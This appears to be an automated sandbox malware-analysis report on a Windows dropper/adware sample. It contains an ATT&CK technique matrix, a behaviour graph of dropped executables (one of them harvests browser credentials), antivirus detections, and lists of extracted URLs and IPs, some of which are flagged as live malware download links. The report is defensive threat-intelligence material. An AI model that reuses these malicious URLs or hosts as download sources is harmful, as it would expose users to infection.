            Source: Yara matchFile source: 19.3.app.exe.3fa0000.3.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 19.2.app.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 19.2.app.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 19.3.app.exe.3fa0000.3.unpack, type: UNPACKEDPE

            Mitre Att&ck Matrix

            Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
            Valid AccountsNative API1DLL Side-Loading1DLL Side-Loading1Disable or Modify Tools1OS Credential Dumping1System Time Discovery2Remote ServicesArchive Collected Data11Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationSystem Shutdown/Reboot1
            Default AccountsCommand and Scripting Interpreter2Application Shimming1Application Shimming1Deobfuscate/Decode Files or Information11Credential API Hooking1Account Discovery1Remote Desktop ProtocolData from Local System1Exfiltration Over BluetoothProxy1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
            Domain AccountsAt (Linux)Windows Service1Access Token Manipulation1Obfuscated Files or Information3Input Capture1File and Directory Discovery2SMB/Windows Admin SharesCredential API Hooking1Automated ExfiltrationSteganographyExploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
            Local AccountsAt (Windows)Registry Run Keys / Startup Folder111Windows Service1Software Packing33NTDSSystem Information Discovery156Distributed Component Object ModelInput Capture1Scheduled TransferProtocol ImpersonationSIM Card SwapCarrier Billing Fraud
            Cloud AccountsCronNetwork Logon ScriptProcess Injection11Timestomp1LSA SecretsQuery Registry1SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
            Replication Through Removable MediaLaunchdRc.commonRegistry Run Keys / Startup Folder111DLL Side-Loading1Cached Domain CredentialsSecurity Software Discovery351VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
            External Remote ServicesScheduled TaskStartup ItemsStartup ItemsFile Deletion1DCSyncVirtualization/Sandbox Evasion4Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
            Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobMasquerading13Proc FilesystemProcess Discovery11Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
            Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Virtualization/Sandbox Evasion4/etc/passwd and /etc/shadowSystem Owner/User Discovery1Software Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
            Supply Chain CompromiseAppleScriptAt (Windows)At (Windows)Access Token Manipulation1Network SniffingRemote System Discovery1Taint Shared ContentLocal Data StagingExfiltration Over Unencrypted/Obfuscated Non-C2 ProtocolFile Transfer ProtocolsData Encrypted for Impact
            Compromise Software Dependencies and Development ToolsWindows Command ShellCronCronProcess Injection11Input CaptureSystem Network Configuration Discovery1Replication Through Removable MediaRemote Data StagingExfiltration Over Physical MediumMail ProtocolsService Stop

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 352870 Sample: SecuriteInfo.com.Generic.mg... Startdate: 15/02/2021 Architecture: WINDOWS Score: 100 82 1.1.1.1 CLOUDFLARENETUS Australia 2->82 106 Antivirus detection for URL or domain 2->106 108 Antivirus detection for dropped file 2->108 110 Multi AV Scanner detection for dropped file 2->110 112 9 other signatures 2->112 10 SecuriteInfo.com.Generic.mg.cf35edde149e46ee.exe 14 7 2->10         started        15 multitimer.exe 2->15         started        17 svchost.exe 1 2->17         started        19 2 other processes 2->19 signatures3 process4 dnsIp5 96 8.8.8.8 GOOGLEUS United States 10->96 98 5.101.110.225 DIGITALOCEAN-ASNUS Netherlands 10->98 76 C:\Users\user\AppData\...\multitimer.exe, PE32 10->76 dropped 78 C:\Users\user\...\multitimer.exe.config, XML 10->78 dropped 80 SecuriteInfo.com.G...dde149e46ee.exe.log, ASCII 10->80 dropped 134 Detected unpacking (overwrites its own PE header) 10->134 21 multitimer.exe 15 19 10->21         started        136 Creates multiple autostart registry keys 15->136 25 multitimer.exe 15->25         started        file6 signatures7 process8 dnsIp9 84 104.248.119.44 DIGITALOCEAN-ASNUS United States 21->84 86 138.197.53.157 DIGITALOCEAN-ASNUS United States 21->86 88 2 other IPs or domains 21->88 128 Multi AV Scanner detection for dropped file 21->128 130 Detected unpacking (overwrites its own PE header) 21->130 132 Machine Learning detection for dropped file 21->132 28 multitimer.exe 1 7 21->28         started        72 C:\Users\user\AppData\...\AwesomePoolE1.exe, PE32 25->72 dropped 74 C:\Users\user\AppData\Local\...\safebits.exe, PE32 25->74 dropped file10 signatures11 process12 signatures13 138 Creates multiple autostart registry keys 28->138 31 multitimer.exe 61 28->31         started        process14 dnsIp15 100 185.51.246.83 ITLDC-NLUA Ukraine 31->100 102 94.130.16.32 HETZNER-ASDE Germany 31->102 104 6 other IPs or domains 31->104 46 C:\Users\user\AppData\Local\Temp\...\app.exe, PE32 31->46 dropped 48 C:\Users\user\AppData\...\tpwlxkeo40z.exe, PE32 31->48 dropped 50 C:\Users\user\AppData\...\5asqork1n2b.exe, PE32 31->50 dropped 52 23 other files (9 malicious) 31->52 dropped 35 2mqvpn30gyk.exe 31->35         started        39 safebits.exe 31->39         started        41 vkfgkd5pxm1.exe 31->41         started        44 4 other processes 31->44 file16 process17 dnsIp18 54 C:\Program Files\89C8W4UQTF\uninstaller.exe, PE32 35->54 dropped 56 C:\Program Files\89C8W4UQTF\89C8W4UQT.exe, PE32 35->56 dropped 58 C:\Program Files\...\uninstaller.exe.config, XML 35->58 dropped 60 C:\Program Files\...\89C8W4UQT.exe.config, XML 35->60 dropped 114 Antivirus detection for dropped file 35->114 116 Machine Learning detection for dropped file 35->116 62 C:\Users\user\AppData\Roaming\...\jdfddn.dll, PE32 39->62 dropped 118 Detected unpacking (changes PE section rights) 39->118 120 Detected unpacking (overwrites its own PE header) 39->120 122 Creates multiple autostart registry keys 39->122 124 Tries to detect virtualization through RDTSC time measurements 39->124 90 139.180.202.218 AS-CHOOPAUS United States 41->90 64 C:\Users\user\AppData\Local\...\Login Data1, SQLite 41->64 dropped 126 Tries to harvest and steal browser information (history, passwords, etc) 41->126 92 212.86.114.14 ON-LINE-DATAServerlocation-NetherlandsDrontenNL Ukraine 44->92 94 185.154.14.180 ITLDC-NLUA Ukraine 44->94 66 C:\Users\user\AppData\...\vksqeekarkn.exe, PE32 44->66 dropped 68 C:\Users\user\AppData\...68oikfEU1.exe, PE32 44->68 dropped 70 C:\Users\user\AppData\Local\...\installer.tmp, PE32 44->70 dropped file19 signatures20

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.

            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            SecuriteInfo.com.Generic.mg.cf35edde149e46ee.exe31%VirustotalBrowse
            SecuriteInfo.com.Generic.mg.cf35edde149e46ee.exe27%ReversingLabsByteCode-MSIL.Packed.Generic
            SecuriteInfo.com.Generic.mg.cf35edde149e46ee.exe100%Joe Sandbox ML

            Dropped Files

            SourceDetectionScannerLabelLink
            C:\Users\user\AppData\Local\Temp\orsnadbtlac\5asqork1n2b.exe100%AviraHEUR/AGEN.1138963
            C:\Users\user\AppData\Local\Temp\hkjbg52kmqr\2mqvpn30gyk.exe100%AviraHEUR/AGEN.1133205
            C:\Users\user\AppData\Local\Temp\0g3fd4syqs1\AwesomePoolE1.exe100%AviraHEUR/AGEN.1139468
            C:\Users\user\AppData\Local\Temp\0g3fd4syqs1\AwesomePoolE1.exe100%AviraHEUR/AGEN.1139468
            C:\Users\user\AppData\Local\Temp\0g3fd4syqs1\AwesomePoolE1.exe100%AviraHEUR/AGEN.1139468
            C:\Users\user\AppData\Local\Temp\fi2zlo3hx4f\g5qbddy2kmz.exe100%AviraHEUR/AGEN.1133205
            C:\Program Files\89C8W4UQTF\uninstaller.exe100%AviraHEUR/AGEN.1133205
            C:\Program Files\89C8W4UQTF\89C8W4UQT.exe100%AviraHEUR/AGEN.1133205
            C:\Users\user\AppData\Local\Temp\qhmeucfqke0\AwesomePoolE1.exe100%AviraHEUR/AGEN.1139468
            C:\Users\user\AppData\Local\Temp\0g3fd4syqs1\AwesomePoolE1.exe100%AviraHEUR/AGEN.1139468
            C:\Users\user\AppData\Local\Temp\b3cadvuqdqg\vkfgkd5pxm1.exe100%AviraHEUR/AGEN.1138963
            C:\Users\user\AppData\Local\Temp\orsnadbtlac\5asqork1n2b.exe100%Joe Sandbox ML
            C:\Users\user\AppData\Local\Temp\hkjbg52kmqr\2mqvpn30gyk.exe100%Joe Sandbox ML
            C:\Users\user\AppData\Local\Temp\pa2g3jfiorw\tpwlxkeo40z.exe100%Joe Sandbox ML
            C:\Users\user\AppData\Local\Temp\cec353i0agk\app.exe100%Joe Sandbox ML
            C:\Users\user\AppData\Local\Temp\fi2zlo3hx4f\g5qbddy2kmz.exe100%Joe Sandbox ML
            C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exe100%Joe Sandbox ML
            C:\Program Files\89C8W4UQTF\uninstaller.exe100%Joe Sandbox ML
            C:\Program Files\89C8W4UQTF\89C8W4UQT.exe100%Joe Sandbox ML
            C:\Users\user\AppData\Local\Temp\cec353i0agk\app.exe100%Joe Sandbox ML
            C:\Users\user\AppData\Local\Temp\b3cadvuqdqg\vkfgkd5pxm1.exe100%Joe Sandbox ML
            C:\Users\user\AppData\Local\Temp\0g3fd4syqs1\AwesomePoolE1.exe30%MetadefenderBrowse
            C:\Users\user\AppData\Local\Temp\0g3fd4syqs1\AwesomePoolE1.exe82%ReversingLabsByteCode-MSIL.Downloader.FakeWave
            C:\Users\user\AppData\Local\Temp\2vze2wqfnvj\installer.exe64%ReversingLabsWin32.Adware.ProxyTracker
            C:\Users\user\AppData\Local\Temp\3irwzwdz0tz\vpn.exe8%MetadefenderBrowse
            C:\Users\user\AppData\Local\Temp\3irwzwdz0tz\vpn.exe3%ReversingLabs
            C:\Users\user\AppData\Local\Temp\4sgbvongjvu\AwesomePoolE1.exe30%MetadefenderBrowse
            C:\Users\user\AppData\Local\Temp\4sgbvongjvu\AwesomePoolE1.exe82%ReversingLabsByteCode-MSIL.Downloader.FakeWave
            C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exe28%ReversingLabsByteCode-MSIL.Adware.CSDIMonetize
            C:\Users\user\AppData\Local\Temp\amgjkax5nv1\AwesomePoolE1.exe30%MetadefenderBrowse
            C:\Users\user\AppData\Local\Temp\amgjkax5nv1\AwesomePoolE1.exe82%ReversingLabsByteCode-MSIL.Downloader.FakeWave

            Unpacked PE Files

            SourceDetectionScannerLabelLinkDownload
            14.2.2mqvpn30gyk.exe.260000.0.unpack100%AviraHEUR/AGEN.1133205Download File
            14.0.2mqvpn30gyk.exe.260000.0.unpack100%AviraHEUR/AGEN.1133205Download File
            17.0.vkfgkd5pxm1.exe.1020000.0.unpack100%AviraHEUR/AGEN.1138963Download File
            19.2.app.exe.400000.0.unpack100%AviraHEUR/AGEN.1117055Download File
            17.2.vkfgkd5pxm1.exe.1020000.3.unpack100%AviraHEUR/AGEN.1138963Download File
            16.0.AwesomePoolE1.exe.650000.0.unpack100%AviraHEUR/AGEN.1139468Download File
            13.2.safebits.exe.3660000.8.unpack100%AviraTR/Patched.Ren.GenDownload File
            13.2.safebits.exe.400000.0.unpack100%AviraTR/Crypt.EPACK.Gen2Download File

            Domains

            No Antivirus matches

            URLs

            SourceDetectionScannerLabelLink
            https://new.multitimer.fun0%Avira URL Cloudsafe
            http://html4/loose.dtd0%Avira URL Cloudsafe
            https://api.googlrapis.com/installer/0%Avira URL Cloudsafe
            https://digitalassets.ams3.digitaloceanspaces.comx0%Avira URL Cloudsafe
            https://pc.inappapiurl.com/api/v1/tracking/buying0%Avira URL Cloudsafe
            http://www.jiyu-kobo.co.jp/jp/H0%Avira URL Cloudsafe
            http://crt.rootg2.amazontrust.com/rootg2.cer0=0%URL Reputationsafe
            http://crt.rootg2.amazontrust.com/rootg2.cer0=0%URL Reputationsafe
            http://crt.rootg2.amazontrust.com/rootg2.cer0=0%URL Reputationsafe
            http://www.trustedlogos.com/0%Avira URL Cloudsafe
            https://pc.inappP0%Avira URL Cloudsafe
            http://www.jiyu-kobo.co.jp/G.F0%Avira URL Cloudsafe
            http://www.fontbureau.comh%0%Avira URL Cloudsafe
            https://fotamene.cominvalid0%Avira URL Cloudsafe
            http://.css0%Avira URL Cloudsafe
            https://awesomepools.space/fees.php#pictureBox1.Image0%Avira URL Cloudsafe
            http://www.jiyu-kobo.co.jp/Y0TTF0%Avira URL Cloudsafe
            http://kwq950.online0%Avira URL Cloudsafe
            http://r3.i.lencr.org/00%URL Reputationsafe
            http://r3.i.lencr.org/00%URL Reputationsafe
            http://r3.i.lencr.org/00%URL Reputationsafe
            http://www.sajatypeworks.com0%URL Reputationsafe
            http://www.sajatypeworks.com0%URL Reputationsafe
            http://www.sajatypeworks.com0%URL Reputationsafe
            http://r3.i.lencr.org/0/0%Avira URL Cloudsafe
            http://devlog.gregarius.net/docs/ua)Links0%Avira URL Cloudsafe
            http://ocsp.rootg2.amazontrust.com080%URL Reputationsafe
            http://ocsp.rootg2.amazontrust.com080%URL Reputationsafe
            http://ocsp.rootg2.amazontrust.com080%URL Reputationsafe
            http://www.founder.com.cn/cnya0%Avira URL Cloudsafe
            http://www.trustedlogos.com/8http://www.trustedlogos.com/8http://www.trustedlogos.com/0%Avira URL Cloudsafe
            https://sndvoices.comhttps://2makestorage.comhttps://sndvoices.comhttps://2makestorage.comMicrosoft0%Avira URL Cloudsafe
            http://www.founder.com.cn/cnu0%Avira URL Cloudsafe
            http://r3.o.lencr.org00%URL Reputationsafe
            http://r3.o.lencr.org00%URL Reputationsafe
            http://r3.o.lencr.org00%URL Reputationsafe
            http://www.sakkal.com0%URL Reputationsafe
            http://www.sakkal.com0%URL Reputationsafe
            http://www.sakkal.com0%URL Reputationsafe
            http://.jpg0%Avira URL Cloudsafe
            https://2makestorage.comidna:0%Avira URL Cloudsafe
            http://s.ss2.us/r.crl00%URL Reputationsafe
            http://s.ss2.us/r.crl00%URL Reputationsafe
            http://s.ss2.us/r.crl00%URL Reputationsafe
            http://cps.root-x1.letsencrypt.org00%URL Reputationsafe
            http://cps.root-x1.letsencrypt.org00%URL Reputationsafe
            http://cps.root-x1.letsencrypt.org00%URL Reputationsafe
            https://new.multitimer.fun/eula0%Avira URL Cloudsafe
            https://pc.inappapiurl.com0%Avira URL Cloudsafe
            http://www.innosetup.com/0%URL Reputationsafe
            http://www.innosetup.com/0%URL Reputationsafe
            http://www.innosetup.com/0%URL Reputationsafe
            http://www.jiyu-kobo.co.jp/jp0%Avira URL Cloudsafe
            http://www.sajatypeworks.como0%Avira URL Cloudsafe
            https://digitalassets.ams3.digitaloceanspaces.com80%Avira URL Cloudsafe
            https://pc.inappapiurl.com/api/v1/buying/redirect/30601988b56f78c9.53290271?sub_id_1=102&sub_id_2=&s0%Avira URL Cloudsafe
            http://cps.letsencrypt.org00%URL Reputationsafe
            http://cps.letsencrypt.org00%URL Reputationsafe
            http://cps.letsencrypt.org00%URL Reputationsafe
            https://noteach.tech/software.php?client=0%Avira URL Cloudsafe
            http://ocsp.di0%Avira URL Cloudsafe
            http://www.trustedlogos.com/A0%Avira URL Cloudsafe
            http://crl.rootca1.amazontrust.com/rootca1.crl00%URL Reputationsafe
            http://crl.rootca1.amazontrust.com/rootca1.crl00%URL Reputationsafe
            http://crl.rootca1.amazontrust.com/rootca1.crl00%URL Reputationsafe
            http://apps.ide7m0%Avira URL Cloudsafe
            http://ocsp.rootca1.amazontrust.com0:0%Avira URL Cloudsafe
            http://www.jiyu-kobo.co.jp/F0%URL Reputationsafe
            http://www.jiyu-kobo.co.jp/F0%URL Reputationsafe
            http://www.jiyu-kobo.co.jp/F0%URL Reputationsafe
            http://nvidsame.com/app/app.exe100%Avira URL Cloudmalware
            http://www.founder.com.cn/cnnoig0%Avira URL Cloudsafe
            https://noteach.tech/add.php?windows=0%Avira URL Cloudsafe
            http://en.w0%URL Reputationsafe
            http://en.w0%URL Reputationsafe
            http://en.w0%URL Reputationsafe
            http://james.newtonking.com/projects/json0%URL Reputationsafe
            http://james.newtonking.com/projects/json0%URL Reputationsafe
            http://james.newtonking.com/projects/json0%URL Reputationsafe
            http://https://_bad_pdb_file.pdb0%Avira URL Cloudsafe
            http://crl.rootg2.amazontrust.com/rootg2.crl00%URL Reputationsafe
            http://crl.rootg2.amazontrust.com/rootg2.crl00%URL Reputationsafe
            http://crl.rootg2.amazontrust.com/rootg2.crl00%URL Reputationsafe
            https://sndvoices.comimage:0%Avira URL Cloudsafe
            http://www.founder.com.cn/cn0%URL Reputationsafe
            http://www.founder.com.cn/cn0%URL Reputationsafe
            http://www.founder.com.cn/cn0%URL Reputationsafe
            https://new.multitimer.fun/marketing/creative/windows/offer_screen/default?mode=click&amp;track_id=30%Avira URL Cloudsafe
            https://new.multitimer.fun/privacy0%Avira URL Cloudsafe
            https://pc.inappapiurl.com/api/v1/buying/redirect/0%Avira URL Cloudsafe
            http://newscommer.com/app/app.exe100%Avira URL Cloudmalware
            http://o.ss2.us/00%URL Reputationsafe
            http://o.ss2.us/00%URL Reputationsafe
            http://o.ss2.us/00%URL Reputationsafe
            http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
            http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
            http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
            http://www.sajatypeworks.comrsivoi0%Avira URL Cloudsafe
            https://blockchain.infoindex0%Avira URL Cloudsafe
            http://crt.rootca1.amazontrust.com/rootca1.cer0?0%URL Reputationsafe

            Domains and IPs

            Contacted Domains

            No contacted domains info

            URLs from Memory and Binaries

            NameSourceMaliciousAntivirus DetectionReputation
            https://new.multitimer.funmultitimer.exe, 00000002.00000002.669240459.0000000002B9E000.00000004.00000001.sdmpfalse
            • Avira URL Cloud: safe
            		unknown
            http://html4/loose.dtdtpwlxkeo40z.exe, tpwlxkeo40z.exe, 0000000F.00000000.724251441.00000000003A2000.00000002.00020000.sdmpfalse
            • Avira URL Cloud: safe
            		low
            https://jrsoftware.org/ishelp/index.php?topic=setupcmdlineSetupUinstaller.exe, 00000012.00000002.804792262.0000000000401000.00000020.00020000.sdmpfalse
              		high
              https://s3.amazonaws.com/malapps/multitimer.exemultitimer.exe, 00000002.00000002.669285433.0000000002BC6000.00000004.00000001.sdmp, multitimer.exe, 00000002.00000002.669240459.0000000002B9E000.00000004.00000001.sdmpfalse
                		high
                https://api.googlrapis.com/installer/installer.exe, 00000012.00000003.731180992.00000000024C0000.00000004.00000001.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                https://digitalassets.ams3.digitaloceanspaces.comxSecuriteInfo.com.Generic.mg.cf35edde149e46ee.exe, 00000001.00000002.648721404.0000000002C60000.00000004.00000001.sdmp, 2mqvpn30gyk.exe, 0000000E.00000002.760206850.000000000263F000.00000004.00000001.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                https://pc.inappapiurl.com/api/v1/tracking/buyingmultitimer.exe, 00000002.00000002.669376413.0000000002C2A000.00000004.00000001.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                http://www.jiyu-kobo.co.jp/jp/HAwesomePoolE1.exe, 00000010.00000003.761458989.000000001D006000.00000004.00000001.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                http://crt.rootg2.amazontrust.com/rootg2.cer0=multitimer.exe, 00000004.00000003.787655460.000000001D5D5000.00000004.00000001.sdmpfalse
                • URL Reputation: safe
                • URL Reputation: safe
                • URL Reputation: safe
                		unknown
                http://digitalassets.ams3.digitaloceanspaces.comSecuriteInfo.com.Generic.mg.cf35edde149e46ee.exe, 00000001.00000002.648727903.0000000002C6B000.00000004.00000001.sdmp, 2mqvpn30gyk.exe, 0000000E.00000002.761859956.000000000264A000.00000004.00000001.sdmpfalse
                  		high
                  http://www.trustedlogos.com/installer.exe, 00000012.00000003.802572245.0000000002381000.00000004.00000001.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://pc.inappPmultitimer.exe, 00000004.00000003.794172433.00000000039CA000.00000004.00000001.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://digitalassets.ams3.digitaloceanspaces.comSecuriteInfo.com.Generic.mg.cf35edde149e46ee.exe, 00000001.00000002.648662757.0000000002BD1000.00000004.00000001.sdmp, 2mqvpn30gyk.exe, 0000000E.00000002.758551056.0000000002632000.00000004.00000001.sdmp, tpwlxkeo40z.exe, 0000000F.00000002.757258767.00000000029A2000.00000004.00000001.sdmpfalse
                    		high
                    http://www.jiyu-kobo.co.jp/G.FAwesomePoolE1.exe, 00000010.00000003.760937918.000000001D006000.00000004.00000001.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://digitalassets.ams3.digitaloceanspaces.com/cstadmo/setups.exetpwlxkeo40z.exe, 0000000F.00000002.757060720.0000000002901000.00000004.00000001.sdmpfalse
                      		high
                      https://digitalassets.ams3.digitaloceanspaces.com/hahaza/Visual19.exe.configSecuriteInfo.com.Generic.mg.cf35edde149e46ee.exe, 00000001.00000002.648757628.0000000002CA3000.00000004.00000001.sdmpfalse
                        		high
                        http://www.fontbureau.comh%AwesomePoolE1.exe, 00000010.00000003.767975089.000000001D006000.00000004.00000001.sdmpfalse
                        • Avira URL Cloud: safe
                        		low
                        http://www.google.ru/?hl=ru&q=illegalapp.exe, 00000013.00000002.838647912.0000000000400000.00000040.00020000.sdmpfalse
                          		high
                          http://www.fontbureau.com/designersAwesomePoolE1.exe, 00000010.00000003.770158331.000000001D014000.00000004.00000001.sdmp, AwesomePoolE1.exe, 00000010.00000003.766514791.000000001D00D000.00000004.00000001.sdmpfalse
                            		high
                            https://fotamene.cominvalidapp.exe, 00000013.00000002.838647912.0000000000400000.00000040.00020000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://.csstpwlxkeo40z.exe, 0000000F.00000000.724251441.00000000003A2000.00000002.00020000.sdmpfalse
                            • Avira URL Cloud: safe
                            		low
                            https://awesomepools.space/fees.php#pictureBox1.ImageAwesomePoolE1.exe, 00000010.00000000.723831514.0000000000652000.00000002.00020000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://www.jiyu-kobo.co.jp/Y0TTFAwesomePoolE1.exe, 00000010.00000003.761458989.000000001D006000.00000004.00000001.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            https://digitalassets.ams3.digitaloceanspaces.com/hahaza/Visual19.exe0ySecuriteInfo.com.Generic.mg.cf35edde149e46ee.exe, 00000001.00000002.648662757.0000000002BD1000.00000004.00000001.sdmpfalse
                              		high
                              https://jrsoftware.org/ishelp/index.php?topic=setupcmdlineinstaller.exefalse
                                		high
                                http://kwq950.onlinemultitimer.exe, 00000004.00000003.838097111.000000000395A000.00000004.00000001.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                https://digitalassets.ams3.digitaloceanspaces.com/hahaza/Visual19.exe.config0ySecuriteInfo.com.Generic.mg.cf35edde149e46ee.exe, 00000001.00000002.648757628.0000000002CA3000.00000004.00000001.sdmpfalse
                                  		high
                                  http://r3.i.lencr.org/0multitimer.exe, 00000002.00000002.668263089.0000000000B9D000.00000004.00000020.sdmp, multitimer.exe, 00000004.00000003.694786238.0000000001053000.00000004.00000001.sdmp, multitimer.exe, 0000000B.00000003.889954389.0000000000A88000.00000004.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  		unknown
                                  http://www.sajatypeworks.comAwesomePoolE1.exe, 00000010.00000003.748742620.000000001D007000.00000004.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  		unknown
                                  https://s3.amazonaws.commultitimer.exe, 00000002.00000002.669376413.0000000002C2A000.00000004.00000001.sdmpfalse
                                    		high
                                    http://r3.i.lencr.org/0/multitimer.exe, 00000004.00000003.898077753.000000001D5E9000.00000004.00000001.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://devlog.gregarius.net/docs/ua)Linksapp.exe, 00000013.00000002.838647912.0000000000400000.00000040.00020000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://ocsp.rootg2.amazontrust.com08multitimer.exe, 00000004.00000003.787655460.000000001D5D5000.00000004.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    		unknown
                                    http://www.founder.com.cn/cnyaAwesomePoolE1.exe, 00000010.00000003.756257315.000000001D006000.00000004.00000001.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://www.trustedlogos.com/8http://www.trustedlogos.com/8http://www.trustedlogos.com/installer.exe, 00000012.00000003.731180992.00000000024C0000.00000004.00000001.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    https://sndvoices.comhttps://2makestorage.comhttps://sndvoices.comhttps://2makestorage.comMicrosoftapp.exe, 00000013.00000002.878710201.00000000144B0000.00000004.00000001.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://www.founder.com.cn/cnuAwesomePoolE1.exe, 00000010.00000003.756257315.000000001D006000.00000004.00000001.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://r3.o.lencr.org0multitimer.exe, 00000002.00000002.668263089.0000000000B9D000.00000004.00000020.sdmp, multitimer.exe, 00000004.00000003.898077753.000000001D5E9000.00000004.00000001.sdmp, multitimer.exe, 0000000B.00000003.889954389.0000000000A88000.00000004.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    		unknown
                                    https://turnitin.com/robot/crawlerinfo.html)couldnapp.exe, 00000013.00000002.838647912.0000000000400000.00000040.00020000.sdmpfalse
                                      		high
                                      http://search.msn.com/msnbot.htm)multipart/form-dataapp.exe, 00000013.00000002.838647912.0000000000400000.00000040.00020000.sdmpfalse
                                        		high
                                        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameSecuriteInfo.com.Generic.mg.cf35edde149e46ee.exe, 00000001.00000002.648662757.0000000002BD1000.00000004.00000001.sdmp, 2mqvpn30gyk.exe, 0000000E.00000002.758551056.0000000002632000.00000004.00000001.sdmpfalse
                                          		high
                                          http://www.sakkal.comAwesomePoolE1.exe, 00000010.00000003.762372067.000000001D03D000.00000004.00000001.sdmpfalse
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          		unknown
                                          https://digitalassets.ams3.digitaloceanspaces.com/cstadmo/tsac/CasterUninstaller.exe2mqvpn30gyk.exe, 0000000E.00000002.753969283.00000000025F1000.00000004.00000001.sdmp, 2mqvpn30gyk.exe, 0000000E.00000002.820645486.00000000127E2000.00000004.00000001.sdmpfalse
                                            		high
                                            http://.jpgtpwlxkeo40z.exe, tpwlxkeo40z.exe, 0000000F.00000000.724251441.00000000003A2000.00000002.00020000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		low
                                            https://2makestorage.comidna:app.exe, 00000013.00000002.838647912.0000000000400000.00000040.00020000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            http://s.ss2.us/r.crl0multitimer.exe, 00000004.00000003.787655460.000000001D5D5000.00000004.00000001.sdmpfalse
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            		unknown
                                            https://digitalassets.ams3.digitaloceanspaces.com/cstadmo/tsac/Caster.exeL2mqvpn30gyk.exe, 0000000E.00000002.742226663.0000000000967000.00000004.00000020.sdmpfalse
                                              		high
                                              http://cps.root-x1.letsencrypt.org0multitimer.exe, 00000002.00000002.668263089.0000000000B9D000.00000004.00000020.sdmp, multitimer.exe, 00000004.00000003.898077753.000000001D5E9000.00000004.00000001.sdmp, multitimer.exe, 0000000B.00000003.889954389.0000000000A88000.00000004.00000001.sdmpfalse
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              		unknown
                                              https://new.multitimer.fun/eulamultitimer.exe, 00000002.00000002.669285433.0000000002BC6000.00000004.00000001.sdmp, multitimer.exe, 00000002.00000002.669240459.0000000002B9E000.00000004.00000001.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              https://pc.inappapiurl.commultitimer.exe, 00000002.00000002.669240459.0000000002B9E000.00000004.00000001.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://www.innosetup.com/installer.exe, 00000012.00000003.753049587.000000007FC30000.00000004.00000001.sdmpfalse
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              		unknown
                                              http://www.fontbureau.comAwesomePoolE1.exe, 00000010.00000003.770340667.000000001D006000.00000004.00000001.sdmpfalse
                                                		high
